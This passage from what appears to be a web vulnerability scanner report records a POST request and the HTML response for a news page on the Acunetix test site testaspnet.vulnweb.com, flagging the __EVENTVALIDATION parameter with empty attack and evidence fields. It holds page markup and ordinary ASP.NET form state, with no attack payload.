10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 465 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 Content-Length: 3765 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,765 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8%2FZtiayAG6OnQCA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLyytPMBgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I%2BC%2BTrBHqvCj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a 